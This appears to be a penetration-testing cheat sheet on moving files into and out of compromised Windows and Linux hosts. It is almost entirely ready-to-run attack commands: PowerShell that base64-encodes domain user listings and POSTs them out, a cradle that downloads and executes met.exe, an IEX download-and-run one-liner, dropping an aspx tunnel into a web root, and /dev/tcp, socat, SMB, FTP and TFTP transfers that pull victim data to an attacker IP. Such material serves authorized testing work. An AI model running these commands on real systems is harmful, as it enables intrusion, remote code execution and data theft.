Base64
String to base64 and POST with PowerShell:
PS > $str = cmd /c net user /domain
PS > $base64str = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
PS > IWR -Uri http://127.0.0.1/msg -Method POST -Body $base64str
File to base64 with certutil:
Cmd > certutil -encode <FILE_TO_ENCODE> C:\Windows\Temp\encoded.b64
Cmd > type C:\Windows\Temp\encoded.b64
Base64 file transfer from Linux to Windows:
$ base64 -w0 tunnel.aspx; echo
...BASE64_CONTENTS...
PS > Add-Content -Encoding UTF8 tunnel.b64 "<BASE64_CONTENTS>" -NoNewLine
PS > $data = Get-Content -Raw tunnel.b64
PS > [IO.File]::WriteAllBytes("C:\inetpub\wwwroot\uploads\tunnel.aspx", [Convert]::FromBase64String($data))
Hex
Compress a binary file and transfer it to Windows by copy-pasting commands into the console:
$ upx -9 file.exe
$ exe2hex -x file.exe -p file.cmd
$ cat file.cmd | xclip -i -sel c
PowerShell
PowerShell upload file:
PS > (New-Object Net.WebClient).UploadFile("http://10.10.13.37/file.txt", "file.txt")
PowerShell auto detect proxy, download file from remote HTTP server and run it:
$proxyAddr=(Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings").ProxyServer;$proxy=New-Object System.Net.WebProxy;$proxy.Address=$proxyAddr;$proxy.UseDefaultCredentials=$true;$client=New-Object System.Net.WebClient;$client.Proxy=$proxy;$client.DownloadFile("http://10.10.13.37/met.exe","$env:userprofile\music\met.exe");$exec=New-Object -com shell.application;$exec.shellexecute("$env:userprofile\music\met.exe")
PowerShell manually set proxy and upload file to remote HTTP server:
$client=New-Object System.Net.WebClient;$proxy=New-Object System.Net.WebProxy("http://proxy.megacorp.local:3128",$true);$creds=New-Object Net.NetworkCredential("snovvcrash","Passw0rd!","megacorp.local");$creds=$creds.GetCredential("http://proxy.megacorp.local","3128","KERBEROS");$proxy.Credentials=$creds;$client.Proxy=$proxy;$client.UploadFile("http://10.10.13.37/results.txt","results.txt")
Another proxy-aware download cradle:
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem "HKU:\" -ErrorAction SilentlyContinue
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start=$key.Name.Substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://$proxyAddr")
$wc = New-Object System.Net.WebClient
$wc.DownloadString("http://10.10.13.37/test.txt") | IEX
Remove-PSDrive -Name HKU -Force
/dev/tcp
Attacker is the sender:
# Sender:
root@kali:~$ tar -zcvf folder.tar.gz folder
root@kali:~$ nc -w3 -lvnp 1234 < folder.tar.gz
# Recipient:
www-data@victim:~$ bash -c 'cat < /dev/tcp/127.0.0.1/1234 > .folder.tar.gz'
www-data@victim:~$ tar -zxvf .folder.tar.gz
Victim is the sender:
# Recipient:
root@kali:~$ nc -w3 -lvnp 1234 > file.txt
# Sender:
www-data@victim:~$ bash -c 'cat < file.txt > /dev/tcp/127.0.0.1/1234'
socat
Recipient (Attacker):
$ socat TCP-LISTEN:1337 OPEN:data.tar,create,append
Sender (Victim):
$ tar cf - /dev/shm/data | socat TCP:10.10.13.37:1337 -
SMB
smbserver.py
Start SMB server:
$ smbserver.py -smb2support share `pwd`
Mount SMB in Windows with net use:
$ smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
Cmd > net use Z: \\10.10.13.37\share
Cmd > net use Z: \\10.10.13.37\share /u:snovvcrash 'Passw0rd!'
Mount SMB in Windows with New-PSDrive:
$ smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
PS > $pass = 'Passw0rd!' | ConvertTo-SecureString -AsPlainText -Force
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $pass)
Or
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force))
PS > New-PSDrive -Name Z -Root \\10.10.13.37\share -Credential $cred -PSProvider FileSystem
PS > cd Z:
net share
Cmd > net share pentest=c:\smb_pentest /GRANT:"Anonymous Logon,FULL" /GRANT:"Everyone,FULL"
Or
Cmd > net share pentest=c:\smb_pentest /GRANT:"Administrator,FULL"
Cmd > net share pentest /delete
FTP
$ python -m pip install pyftpdlib
$ python -m pyftpdlib -Dwp 2121
Cmd > cd C:\Windows\System32\spool\drivers\color
Cmd > echo 'open 127.0.0.1 2121' > ftp.txt
Cmd > echo 'user anonymous' >> ftp.txt
Cmd > echo 'anonymous' >> ftp.txt
Cmd > echo 'binary' >> ftp.txt
Cmd > echo 'put file.bin' >> ftp.txt
Cmd > echo 'bye' >> ftp.txt
Cmd > ftp -v -n -s:ftp.txt
TFTP
Send file.exe from Windows to Linux (TFTP client must be enabled on Windows):
$ sudo atftpd --daemon --bind 10.10.13.37 --port 69 ./tftp
Cmd > tftp -i 10.10.13.37 put file.exe
$ sudo pkill atftpd
Exfiltration / Infiltration
Tools
http-server
$ sudo apt install npm -y
$ sudo npm install http-server -g
$ sudo http-server -d false -p 443 -S -C /etc/letsencrypt/live/example.com/cert.pem -K /etc/letsencrypt/live/example.com/privkey.pem --log-ip | tee http-server.log
goshs
$ eget -qs linux/amd64 "patrickhener/goshs" --to ~/tools/goshs
$ sudo ~/tools/goshs/goshs -ro -si -p 443 -s -sc /etc/letsencrypt/live/example.com/cert.pem -sk /etc/letsencrypt/live/example.com/privkey.pem -V | tee goshs.log
simplehttpserver
$ eget -qs linux/amd64 "projectdiscovery/simplehttpserver" --to ~/tools/pd
$ sudo ~/tools/pd/simplehttpserver -listen 10.10.13.37:1337 -path `pwd` -upload -https -cert /etc/letsencrypt/live/example.com/fullchain.pem -key /etc/letsencrypt/live/example.com/privkey.pem -domain example.com -basic-auth 'snovvcrash:Passw0rd!' -max-file-size 100
Last updated
